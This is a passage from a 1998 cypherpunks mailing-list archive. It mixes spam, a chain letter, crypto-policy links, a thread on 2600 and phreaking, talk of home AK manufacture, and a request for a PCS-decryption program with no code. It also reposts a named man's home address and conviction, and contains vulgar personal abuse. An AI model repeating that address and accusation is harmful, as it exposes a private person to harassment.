****************************************************************
This is not unsolicited email.
Your email address was routed to our "auto send" program stating 
that you wish to receive information about our dental, vision & 
prescription drug program. If your email address was referred to 
our "auto send" in error, please accept our apology. Just type 
"REMOVE" in the subject line and the "auto send" will remove your 
email address.
****************************************************************


******* DENTAL PLAN

$9 per month for a single person
$15 per month for entire household, (everyone at your house)

**No waiting period, No limit on visits or services, Braces 
included, Cosmetic dentistry included, specialist included, 
pre-existing conditions are covered, No deductible, No age limit, 
No claim forms, You can change dentist whenever you want.

******* VISION CARE

Free with $9/$15 dental plan

**Over 12,000 optical providers nationwide, save up to 60%, save 
up to 60% on contact lenses, save up to 30% on eye exams and 
surgery, save up to 50% on all non-prescription sunglasses, 30 
day unconditional money back guarantee, only national plan 
endorsed by the Opticians Association of America.

******* PRESCRIPTION DRUGS

Free with $9/$15 dental plan

**Over 35,000 retail pharmacy locations nationwide including most 
chain pharmacies and independent pharmacies, save up to 50% on 
prescription drugs, all prescription drugs are covered both at 
the retail pharmacy and by mail order.

If you want to sign up for the dental program just follow the 
directions below. 

FAX the following to DENTAL PLAN. 
The fax number is 1-713-266-0390.

DENTAL PLAN
Name
Address                            <----  very important 
City, State, Zip code              <----   information
Day Phone #
Night Phone #
Fax Phone #
Email address

We are currently needing brokers for the $9/$15 Dental Plan. If 
you or someone you know is looking for an additional income 
PLEASE LET US KNOW when you fax the above information. The Dental 
Broker program has a nice up front pay cycle and a very good 
residual for as long as the person is in the dental plan. And 
there is no license required to be a broker.

So let us know about the dental and if you know of someone 
wanting to be a broker. Tell them to contact us by faxing the 
same information.

Thank you again for your interest.

Cliff





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 7 Apr 1998 00:38:57 -0700 (PDT)
To: jeffb@issl.atl.hp.com>
Subject: RE: Regulating the Regulators / Re: regulating the internet (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE20278D4@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> Jeff Barber[SMTP:jeffb@issl.atl.hp.com]  wrote , in reply to Jim Choate,
> replying to William Geiger:
> 
> Many people will argue that Medicaid, Medicare and the like are not
> Bad Things.  But they can't honestly be labeled "insurance".  And they
> definitely *are* "socialist" mechanisms.

They're not socialist - just the welfare state. If that's all you mean by
"socialist" you end up including all sorts of odd people - like Bismarck's
Prussia, the arch-conservative empire which invented the welfare state.  In
fact you include practically all government. Even occupying armies usually
try to do famine relief, if only to get the refugees off the roads.   The
word becomes so broad it is emptied of meaning and is only used as an insult
- just like the way some peope on the left use "Nazi" or "fascist"

If "socialist" means anything it has to mean social control of the supply
side - as opposed to "capitialism" which is control by the suppliers of
capital. Like it says in a Good Old Clause: "to secure for the workers by
hand or by brain the full fruits of their industry ... upon the basis of
thwe common ownership of the means of production, distribution, and
exchange..."  It's possible to imagine a socialist economy in which there
was no welfare system - ownership of business distributed amongst everybody,
managers of each business appointed  democratically; everyone starts with an
equal share,  but no helping hand if you don't make out. Whether many people
who say they are socialists would want to live in such an economy is a
different question.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perrin ." <pleontks@hotmail.com>
Date: Tue, 7 Apr 1998 06:22:40 -0700 (PDT)
To: frankunderwood@hotmail.com
Subject: Fwd: My RoZe 2 U!!! @~~~~~~{~~~~~~~~~~ (I MISS YOU!)
Message-ID: <19980407132158.17451.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


                 _-----_
               //   __   \\--,
            ,\  //@))\  || /
           \\   \   //   \//
               \\__\||__/
                      \\      ,-,
                   ,__'\\`  /'  \      "A part of you has grown in me,
                  \     \\ /      \     together forever we shall be,
                    ' --_||__---'       never apart,                                            
\\            maybe in distance,
                           \\,          but not in heart"
                           '\\
                             \\
 This is the sacred RED ROSE.  You MUST pass this rose on to at least  5 
people within the hour of receiving this rose.  After you do, make  a 
wish. If you have passed it on, your wish will come true and love   will 
come your way shortly.  If you didn't, your life will be cursed  for 
eternity and you will not have any love in your life whatsoever.
   
 It's your choice.  Make the right one.....
  
  @->->>-    ^v^  -<<-<-@
  To a friend, from a friend
  Pass it on to those who deem worthy of your time and friendship.
  *And remember never to forget who your friends are.
  @->->>-    ^v^  -<<-<-@
  Remember:
 	"GOOD FRIENDS ARE HARD TO FIND .....................  SO          
CHERISH THE ONES YOU HAVE !!!"




-----------------------
Fixed by Perrin
pleontks@hotmail.com
http://members.tripod.com/~pleontks


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@pornempoium.com
Date: Tue, 7 Apr 1998 11:39:51 -0700 (PDT)
To: webmaster@pornemporium.com
Subject: No Subject
Message-ID: <v02130502b150137679b0@[209.39.66.146]>
MIME-Version: 1.0
Content-Type: text/plain


This message is intended for Adult Webmasters.  If you received this
message in error or do not wish to receive future offers, please reply with
the subject REMOVE.

Brand New XXX Content

The Porn Emporium has just released 5 new picture cd's and one video cd for
license on your adult website. Each of the titles features some of the porn
industries hottest stars and freshest amateurs. All pictures are
professionally shot and retouched, and scanned with the Kodak PhotoCD
process. Each CD has a 100% SATISFACTION GUARANTEE !!!  Pictures as low as
$0.15 per pic. Quantity discounts and reduced rate memberships are
available...

1) Hollywood Amateurs  I-

500 Explicit Hardcore Amateur pics from the Award Winning "Hollywood
Amateurs" series. From trailer parks to parking lots, this cd has it all.

2) Oral Delights  I-

Blowjobs, cunnilingus, cumshots, group and lesbian... You get the picture.
500 Action pics. All high quality.

3) Color Of Love I -

 500 Super high quality ethnic pics. Black on black, black on white, black
on asian. All hardcore, all categories.

4) Hard Core I -

Need we say more? Sex, toys, group, lesbian, anal, comshots, blowjobs, and
some  Porns biggest stars. 500 Super high quality pics. A must for every
site.

5) NY Gay -

600 High qulaity hard and softcore gay pics. From young studs to seasoned
Porn stars.

6) Heavenly Clips - (video)

100 Super High Quality HARDCORE video clips. Each a minimum of 1 minute in
length featuring some of porns biggest stars and hottest young startlets.
Each cd contains both .avi, .mpg and VIVO formats for your convenience.
Each of these formats can be converted into Real Video streams.

You can check out some sample pics at <http://www.pornemporium.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Glave <james@wired.com>
Date: Tue, 7 Apr 1998 14:44:39 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Canada's Crypto Policy
Message-ID: <3.0.32.19980407144333.0070bb70@get.wired.com>
MIME-Version: 1.0
Content-Type: text/plain


Also see my Wired News piece on this meeting:

http://www.wired.com/news/news/politics/story/11397.html

Crypto Canucks: Hands Off Our Keys! 
                      5:03 am PST 2 Apr 98 - The captains
                      of Canada's cryptography industry sent a
                      message to Ottawa yesterday: keep
                      clear of domestic crypto controls, and
                      lighten up on the export policies. Was
                      anyone listening? 

At 03:22 PM 4/7/98 -0400, John Young wrote:
>Thanks to mctaylor and Carrie Bendzsa at Entrust we offer 
>her transcription of the recent Entrust roundtable on Canada's 
>Cryptography Policy:
>
>   http://jya.com/CA-crypto.htm  (113K)
>
>Good, vigorous discussion of how US export policy inhibits
>Canada's crypto policy and commerce. And what might be 
>done to get the CA gov to defy the supercop without getting 
>shackled like US miscreants.

            James Glave : Senior Technology Writer : Wired News
                   http://www.wirednews.com : 415.276.8430




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Your Yashy <nmarion@chat.carleton.ca>
Date: Tue, 7 Apr 1998 11:52:41 -0700 (PDT)
To: pgp-users@joshua.rivertown.net
Subject: RE: [PGP-USERS-4748]: Legality in Canada
In-Reply-To: <005d01bd620e$998f2000$b4026ac2@menezo>
Message-ID: <Pine.SOL.3.96.980407143843.17989C-100000@prince>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 7 Apr 1998, H. M. wrote:

> What's this 2600??
> 
> I think it refers to the 2600 FAQ.  Its a faq (Frequently Asked Questions)
> about hacking, phreaking, and other related stuff which (I believe) was
> originally made up by 2600 questions and answers (hence the name).
> They also hold meetings (in US and/or Canada?) in which, I guess, the
> attendants are supposedly hackers and phreakers.
I think you should perhaps read a little more maboy. 2600 is not an FAQ,
although, with any "group" nowadays, there is a FAQ avaliable for newbies
etc (obviously like yourself). 2600 refers to a frequency, NOT a q and a,
actually it derived from a tone that could "steal" trunk lines. They are
not "supposedly hackers and phreakers". Aso the debatable issure of exact
translation of a hacker, IMO it is anyone that has altered ANY program. 
p.s. If it wasn't for hackers, you wouldn't have the technology you have.


> For what I've read on the inet, they sort of portray themselves as "outlawed
> heroes" unjustly prosecuted or so, which IMHO rises a question:
OH what you've read on the beloved www. I'd imagine you read an article on
a webpage full of sex ad banners as well. I don't feel that I am an
"outlawed hero" but I feel I better society in various ways.


> they claim that all data should be freely available, and since it's not,
> they ilegally enter other's systems by breaking into them... but, aren't we
> here talking about encryption as a means of protecting your data and your
> privacy?  if so, aren't these people supposed to be a threat to all of us?
As I've already said, you have alot more reading to do.
I agree this is not a mailinglist for anything other than PGP. And how
this thread evolved so far is by negligence.
RTFM

- -yashy-     

> 
> H. Menezo Ganau
> homega@vlc.servicom.es
> homega@latinmail.com
> 
> 
> DH/DSS  (1024/1024)
> Key ID:  0x614DB9FA
> 
> RSA (2048)
> Key ID:  0x160B1B5B
> 
> 
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: pgp-users-unsubscribe@joshua.rivertown.net
> For additional commands, e-mail: pgp-users-help@joshua.rivertown.net
> 

- -shareware email coutesy of yashy- -send $10 cdn funds if you read it-
email@reply     irc@ircnet #italy     icq@4497826    pgpID@ 0xD0186E85
pubring@www.chat.carleton.ca/~nmarion   home@ottawa canada   sleep@7am
- -                                                                    -
     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNSp1XD8rI+jQGG6FAQEP3QQAqj9Qg0XbFJeLauyvW586nd0Urmmkv9t3
D3O7M0oBhbn1dPNKCPJ+ZZsSF5V12LSz+cY8MV2Ul4nIx8HneBRsPA2/WzyNBYrS
qZMn205XzgbXUL2/ZU5qv8ZKX+921wfBf/wdtIQmW2+FoxEQU0rVna97EG1DIJ/r
L7Y3oTH45/c=
=vNUE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 7 Apr 1998 12:21:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Canada's Crypto Policy
Message-ID: <199804071921.PAA17533@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to mctaylor and Carrie Bendzsa at Entrust we offer 
her transcription of the recent Entrust roundtable on Canada's 
Cryptography Policy:

   http://jya.com/CA-crypto.htm  (113K)

Good, vigorous discussion of how US export policy inhibits
Canada's crypto policy and commerce. And what might be 
done to get the CA gov to defy the supercop without getting 
shackled like US miscreants.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Tue, 7 Apr 1998 12:46:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Nobody's Friend
Message-ID: <25e998e4.352a824f@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 4/7/98 2:26:38 PM Central Daylight Time, nobody@REPLAY.COM
writes:

<< From:         tsatan@hotmail.com >>

I would read that as - T(he)Satan@HOTmail.com if I were you! ;-)  I think he
thinks he's serious. (a reminder - IMHO, the Christian Coalition is the anti-
Christ in disguise)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Tue, 7 Apr 1998 13:06:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is Privacy-hater Gary Burnore a Sex Offender?
In-Reply-To: <199804071904.VAA03935@basement.replay.com>
Message-ID: <Pine.SOL.3.96.980407155708.9460B-100000@c00989-224wi.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Apr 1998, Anonymous wrote:

>I just found this posted to usenet.  Can anyone in NC verify it?
>
>Subject:      IMPORTANT: Gary L. Burnore is a Sex Offender!
>>From:         tsatan@hotmail.com
>Date:         1998/04/06
>Message-ID:   <6gau3g$82$1@orthanc.reference.com>
>Newsgroups:   triangle.general
> 
>Looking through the new NC Sex Offender Registry, who did I see?
>   GARY LEE BURNORE
>   4201 BLAND ROAD APT J
>   RALEIGH NC 27609
>Offense and Conviction Information:
>   Conviction Date: 03-13-1997
>   NC Statute: 14-202.1 - INDECENT LIBERTY MINOR
>   Sentence Imposed: PROBATION 3Y
>   Court County: SANTA CLARA, CA
>   
>Two questions:
>   1-Is this the same jerk who posts regularly to triangle.general?
>   2-If so: anyone know anything else about this conviction?
> 
>Thanks.
>

yes, it is confirmed.  search at the site below.  

The North Carolina Sex Offender and Public Protection Registry
http://sbi.jus.state.nc.us/SOR/Default.htm

i don't read triangle.general though so i don't know if it is the same
person.  the address listed above is just a few blocks from my house
though.  

just great.  

i'll have to keep my cat and dog inside from now on.


Ken Williams

ORG: VP of The E.H.A.P. Corp.   
EML: ehap@hackers.com             
WWW: http://152.7.11.38/~tattooman/   
     http://www.hackers.com/ehap/ 
PGP: finger tattooman@152.7.11.38                       








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trans World Specials" <twaweb@inet2.twa.com>
Date: Tue, 7 Apr 1998 11:54:59 -0700 (PDT)
To: Trans World Airlines Customers <twaweb@inet2.twa.com>
Subject: Trans World Specials Fare Sales
Message-ID: <19980407161159.26450.qmail@inet2.twa.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Trans World Specials for April 7th, 1998.
 Fares are valid for travel originating 4/11/98 and 
 returning either 4/13/98 or 4/14/98.  All fares must be
 purchased by 4/10/98.  
 
 TWA recently completed an expansion of our 
 narrow-body fleet with 60 % more seats in 
 First Class.  Have you heard about the new 
 Aviators Frequent Traveler Program?  Get 
 all the latest news from TWA at 
 http://www.twa.com
 
 We have some great fares this week to help you celebrate 
 Easter and Passover with family and friends.
 
 As always, our domestic Trans World Specials may 
 originate in either direction. 
 
 On to this week's Trans World Special.
 
 
 ********************Coach Fares**********************
 
 
 Roundtrip fares between ST. LOUIS, MO (STL) and :
 
 Cedar Rapids, IA (CID)		$69	
 Little Rock, AR (LIT)		$69
 Albuquerque, NM (ABQ) 		$129
 Palm Springs, CA (PSP)		$159
 San Antonio, TX (SAT)		$129	
 
 
 Roundtrip fares between CEDAR RAPIDS, IA (CID) and:
 
 Colorado Springs, CO (COS) 	$99
 Albuquerque, NM (ABQ)		$129
 Washington DC (National only)	$129
 New York, NY (LGA only)		$129
 San Antonio, TX (SAT)		$129
 Palm Springs, CA (PSP)		$159
 
 Roundtrip fares between LITTLE ROCK, AR (LIT) and :
 
 Cedar Rapids, IA (CID)		$89
 Colorado Springs, CO (COS)	$99
 Washington, DC (National only)	$129
 New York, NY (LGA only)		$129
 Palm Springs, CA (PSP)		$159
 
 Roundtrip fares between WASHINGTON, DC(National only) and:
 
 Palm Springs, CA (PSP)		$179
 Colorado Springs,  CO (COS)	$159
 San Antonio, TX (SAT)		$159
 
 Roundtrip fares between NEW YORK, NY (LGA only) and:
 
 Palm Springs, CA (PSP)		$179
 Colorado Springs, CO (COS)	$159
 San Antonio, TX (SAT)		$159
 
 
 *****************FIRST CLASS*************************
 
 
 Roundtrip FIRST CLASS fare between ST. LOUIS, MO (STL)  and:
 
 Austin, TX (AUS)		$349
 New Orleans, LA	(MSY)		$349
 
 Travel is not valid on Trans World Express Flights series 7000-7999
 
 Call TWA at 1-800-221-2000 and book your Trans World Special today
 
 
 ***************TWA GETAWAY  VACATIONS*************
 
 
 RENO - Eldorado Hotel and Casino Includes:
 
 - roundtrip economy airfare
 - 3 day/2 night accommodations at the Eldorado Hotel and Casino
 - one FREE breakfast buffet at the Chef's Pavilion
 - El Dorado features world class accommodations and the dazzling 'Smokey Joe's Cafe' show
 - 2000 bonus FFB miles in addition to actual miles earned
 - only $255 from Atlanta, Cedar Rapids, Cleveland, Columbus, Cincinnati, Dayton, 
 - Dallas, Des Moines, New Orleans, St. Louis and many other TWA cities
  -only $299 from Boston, Baltimore, Charlotte, Newark, New York, Norfolk, Philadelphia
 - Washington,  Jacksonville, Orlando, Memphis and many other TWA cities
 
 
 HIGHLIGHTS OF BRITIAN AND IRELAND for only $2789 Includes:
 
 - visit London, Salisbury, Stonehenge, Bath, Waterford, Blarney, Killarney, Dublin, 
 - Chester, Stratford, Upon Avon, Winchester
 - 15 day/13 night escorted vacation
 - roundtrip economy airfare
 - buffet breakfast daily
 - sightseeing and Ferry across the Irish Sea
 - private luxury motorcoach
 - available for 5/16/98 departure from Cleveland, Detroit, Houston, Indianapolis, Chicago and St. Louis
 - 5000 bonus FFB miles in addition to actual miles earned
 
 Call 1-800-GETAWAY( 438-2929) and book your GETAWAY vacation today !
 
 
 ***************ALAMO******************************
 
 
 Alamo offers these low rates for an economy car valid 4/18/98 - 4/20/98
 
 $16.99		San Antonio , Austin, 
 
 $17.99		St. Louis,  Little Rock
 
 $20.99		Washington-DC (National), New Orleans
 
 $24.99		Colorado Springs
 
 For reservations call Alamo at 1-800-GO-ALAMO and request rate code RT and
 ID # 443833. For online reservations access Alamo at http://www.goalamo.com
 
 
 *****************HILTON HOTELS/RESORTS******************
 
 Hilton Hotels/Resorts offers these low rates valid the nights of 4/11/98 - 4/14/98
 
 $89		Washington National Airport Hilton, Arlington VA ( free airport
 		shuttle, only 5 minutes from major DC sites)
 
 $99		The Capital Hilton Washington, DC ( Cherry Blossom Festival
 		this weekend !  located near all major sites
 
 $106		Hilton of Santa Fe, Santa Fe NM ( visit enchanting New Mexico, enjoy
 		great skiing and historical attractions)
 
 $175		New York Hilton and Towers New York,  NY ( located at Rockefeller Center 
 		near theatres and shopping)
 
 $219		The Waldorf Astoria New York, NY ( fitness center, numerous in-house 
 		restaurants, near shopping and theatres)
 
 For reservations call Hilton at 1-800-774-1500 and ask for Hilton Value Rates. Visit Hilton online at
 http://www.hilton.com
 
 
 *************TERMS & CONDITIONS*****************************
 
 Airfare Terms and Conditions: 
 GENERAL CONDITIONS: Fares shown are round trip, nonrefundable and are subject to change. 
 Changes to itinerary are not permitted. Fares do not include Passenger Facility Charges of 
 up to $12 depending on itinerary. Must use E-Ticketing for domestic travel. Credit card is 
 the only form of payment accepted. Offer is not available in conjunction with any other 
 discount, coupon or promotional offer. Seats are limited and may not be available on all 
 flights or days of the week. Tickets must be purchased at time of booking and no later than 
 4/10/98. Standby passengers not allowed. DOMESTIC: Valid for outbound travel on Saturday 
 (4/11) and return Monday (4/13) or Tuesday (4/14). Travel is effective 4/11/98 with all 
 travel to be completed by 4/14/98. Minimum stay is 2 days. Maximum stay is 3 days. 
 
 Getaway Conditions: 
 ALL PACKAGES: Package include round-trip economy airfare from cities indicated. Price is 
 per person based on double occupancy and is subject to change. Availability, restrictions, 
 surcharges, blackouts and cancellation penalties apply. No other discounts or promotions 
 are valid in conjunction with these packages. 
 DOMESTIC CONDITIONS: Depart for Reno Sunday-Wednesday and return Tuesday-Friday. Travel is 
 valid 4/15/98-5/20/98 with all travel completed 5/22/98. Package also includes roundtrip 
 transfers to hotel. Price does not include Passenger Facility Charges of up to $16 per 
 person. Full payment due on/before 4/6/98. 
 INTERNATIONAL CONDITIONS: Seats are limited and may not be available on all flights. Price 
 does not include Passenger Facility Charges, US departure/arrival, agriculture, and security
 fees from point of origin of travel up to approximately $90 per person. Single supplement 
 $499. Full payment is required by 4/13/98. 
 
 Car Rental Conditions: 
 Taxes (including in California, VLF taxes ranging up to $1.89 per day), registrations 
 fee/tax reimbursement, and airport access fees/taxes, if any, are extra. Optional CDW, 
 liability insurance, fuel, additional driver fee, drop charges and other optional items 
 are extra. Rates higher for renters under age 25. Rates valid for rentals commencing on 
 Saturday and ending by 11:59 PM on Tuesday. Rates only valid during week in which they are 
 published via TWA Internet site. A 24-hour advance reservation is required. Availability is 
 limited. 
 
 Hotel Conditions: 
 Hilton Hotels and Resorts special rates are available only during the specific week in which
 they are published via the TWA Hot Deals Internet site and the HiltonNet Internet site. 
 Limited availability; rooms at these Hilton Value Rates are sold on a first-come, 
 first-served basis. Availability, rate, and terms of occupancy are not guaranteed and will 
 be confirmed at time of reservation. Participating hotels, rates and terms are subject to 
 change without notice. Single or double occupancy. Early check-in, late check-out subject 
 to availability. No extra charge for children when they stay in parents' or grandparents' 
 room; total room occupancy subject to local fire safety regulations and other applicable 
 laws or regulations. Rates vary by season, do not include any other fees or charges, 
 including without limitation state or local taxes or gratuities and are subject to change 
 without notice. Advance booking required. Advance deposit may be required. Offer cannot be 
 combined with any other special discounts, coupons, certificates, special rates, 
 promotional offers, award stays, or meeting/group stays. Hilton reserves the right to cancel
 any Hilton Value Rate at any time without notice. Hilton is not responsible for the terms 
 of other offers in the program, or for any electronic, computer, telephone, security, virus
 or any other problem or damage related to use of the program or its offers. 
 
 
 
 --------------------------------------------------------------------------------
 
 
 For reservations call 1-800-221-2000 (domestic) or 1-800-892-4141 (international) 
 or call your travel agent and ask for TWA's special Internet fares. 
 
 
 
 
 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Mon, 6 Apr 1998 23:52:01 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Pauline Hanson's One Nation April Newsletter
Message-ID: <1.5.4.32.19980407064648.006d9a24@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Issue 1.9, April 1998

----------------------------------------------------------------------------
PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return this message
in the body.
----------------------------------------------------------------------------

Dear One Nation Supporter in New South Wales

--------

L A S T    C H A N C E!!!!!

DRAW THIS WEEKEND!

Have you got your tickets for One Nation first birthday raffle yet?

The first prize is a QANTAS Global Explorer Holiday for two valued at
$12,000 - a 23 day trip visiting Paris, London, New York, Los Angeles,
Anaheim and Honolulu.

The second prize is a 7 day holiday to Hawaii at the Outrigger Reef Hotel
for two - value $5,000.

The third prize is a 7nights stay at the Novotel Palm Cove at Cairns - value
$3,000.

You can order a book of 5 tickets (minimum) at $10 per book (or $2 per
ticket) by credit card by phoning 1800 620088.

Winner's names being drawn at One Nation's Birthday Party at 7pm on April
11th 1998.

Winners will be notified by phone and mail with the results being published
in the Sydney Morning Herald on Friday 17th April 1998.

Be quick - order now while tickets remain!

---------

The Federal and Queensland One Nation web sites are now live but still under
construction. 

12 Queensland Federal members can be viewed and about 40 Queensland State
members are now on-line - many with photographs and background information.

Federal web site at:
http://www.gwb.com.au/onenation/federal
(PLEASE HELP WHERE YOU CAN - SEE LINK TO "Becoming involved".)

Qld State Web Site at:
http://www.gwb.com.au/onenation/qldstate

Last weekend about 50 Queensland One Nation candidates met at Toowoomba,
images and story:
http://www.gwb.com.au/onenation/qldstate/toowoomba/

This weekend will be a historic one. It was less than 12 months ago that
Pauline Hanson launched her party 

(FULL STORY ON THE LAUNCH ON April 10 1997 ON THE ONE NATION ARCHIVE HERE:
http://www.gwb.com.au/gwb/news/onenation/launch.html)

We have established a new web page called "
Pauline Hanson's One Nation - the first year".


***********Bookmark this website at:************
http://www.gwb.com.au/gwb/news/history

from this website you will be able to follow the action at Pauline's farm
this weekend (10th to 12th April). The writer will be arriving early this
Friday and be recording the events with images daily - until Sunday 12th
April. (Remember to use your browser's refresh option).

GWB 



Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Tue, 7 Apr 1998 14:26:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:Nobody
Message-ID: <42ab22dc.352a99b7@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 4/7/98 4:19:39 PM Central Daylight Time, nobody writes:

<< Stan, somebody needs to pry your cocksucking lips off 
 of Pat robertson's cock long enough to beat your stupid 
 fucking ass down with a clue-by-four.
 
 stop swallowing all that mainstream media jizz, you
 fucking cumbucket, and quit the dope too. >>

I see you've come out of your closet, Nobody!  

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sumlatino <Sumlatino@aol.com>
Date: Tue, 7 Apr 1998 18:23:07 -0700 (PDT)
Subject: hi
Message-ID: <9735204b.352ac22f@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: Sumlatino@aol.com
Subject: hi
From: Sumlatino <Sumlatino@aol.com>
Date: Tue, 7 Apr 1998 20:09:29 EDT
Organization: AOL (http://www.aol.com)

<a href="http://members.xoom.com/hitlerx/index.html">Click here for FREE
pictures</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 7 Apr 1998 12:04:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Is Privacy-hater Gary Burnore a Sex Offender?
Message-ID: <199804071904.VAA03935@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I just found this posted to usenet.  Can anyone in NC verify it?

Subject:      IMPORTANT: Gary L. Burnore is a Sex Offender!
From:         tsatan@hotmail.com
Date:         1998/04/06
Message-ID:   <6gau3g$82$1@orthanc.reference.com>
Newsgroups:   triangle.general
 
Looking through the new NC Sex Offender Registry, who did I see?
   GARY LEE BURNORE
   4201 BLAND ROAD APT J
   RALEIGH NC 27609
Offense and Conviction Information:
   Conviction Date: 03-13-1997
   NC Statute: 14-202.1 - INDECENT LIBERTY MINOR
   Sentence Imposed: PROBATION 3Y
   Court County: SANTA CLARA, CA
   
Two questions:
   1-Is this the same jerk who posts regularly to triangle.general?
   2-If so: anyone know anything else about this conviction?
 
Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Tue, 7 Apr 1998 22:09:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: cmea
Message-ID: <199804080500.WAA13654@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


A few weeks ago someone referenced a program that realtime
decrypted PCS crypto however I managed to loose it and the 
archives seem to be not available. Could someone repost
the name of the program or even better a link to it...

thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 7 Apr 1998 13:52:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Stan is Nobody's Friend?
Message-ID: <199804072052.WAA16460@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Tue, 7 Apr 1998 15:45:17 EDT
From: StanSquncr <StanSquncr@aol.com>
To: cypherpunks@toad.com
Subject: Nobody's Friend

In a message dated 4/7/98 2:26:38 PM Central Daylight Time, nobody@REPLAY.COM
writes:

<< From:         tsatan@hotmail.com >>

I would read that as - T(he)Satan@HOTmail.com if I were you! ;-)  I think he
thinks he's serious. (a reminder - IMHO, the Christian Coalition is the anti-
Christ in disguise)

Stan


Stan, somebody needs to pry your cocksucking lips off 
of Pat robertson's cock long enough to beat your stupid 
fucking ass down with a clue-by-four.

stop swallowing all that mainstream media jizz, you
fucking cumbucket, and quit the dope too.

your daddy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 7 Apr 1998 21:24:27 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Cost of Ak manufacture
Message-ID: <199804080420.XAA15085@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


With the current prices on AK clones being around $400, I expect that
their domestic manufacture will become profitable. In fact, as someone
else has noted, any toy maker would be able to produce all parts of the
AKs, with the possible exception of barrels.

Judging by their construction, there is not a lot of costs and they
should be a lot cheaper than AR-15s (against which I have almost nothing).

So, the question is, it is realistic to expect that AK s will be
manufactured here? Will the control freaks be able to stop it?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt1@snowhill.com (Al Thompson)
Date: Wed, 8 Apr 1998 02:13:03 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Cost of Ak manufacture
Message-ID: <199804080912.EAA20228@frost.snowhill.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 PM 4/7/98 -0500, Igor Chudov @ home wrote:

>Judging by their construction, there is not a lot of costs and they
>should be a lot cheaper than AR-15s (against which I have almost nothing).
>
>So, the question is, it is realistic to expect that AK s will be
>manufactured here? Will the control freaks be able to stop it?
  
Two major problems.  There is VERY little domestic manufacture of 7.62x39
ammo, and most of what is already out there is not reloadable.  Even if AK
clones became widespread, all the feds would have to do would be to ban the
import of the ammo.
 
Secondly, while it would certainly be possible for a manufacturing facility
to construct an AK from raw materials, if "push comes to shove," it would be
much faster and cheaper for people to "reconstruct" the Sten parts they have
laying around.  This has the added advantage that ammo is readily available
for those.
 
While 7.62x39 might become hard to find, the common US military and NATO
calibers (7.62NATO, 5.56, and 9mm) will be widely available.
 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Your Yashy <nmarion@chat.carleton.ca>
Date: Wed, 8 Apr 1998 02:22:01 -0700 (PDT)
To: "H. M." <homega@vlc.servicom.es>
Subject: RE: [PGP-USERS-4748]: Legality in Canada
In-Reply-To: <002b01bd6261$02cd4a40$c0026ac2@menezo>
Message-ID: <Pine.SOL.3.96.980408050939.11203A-100000@prince>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 7 Apr 1998, H. M. wrote:

> >I think you should perhaps read a little more maboy...
> 
> I know I should, and I do.  Never claimed to be a guru or else, did I?  I
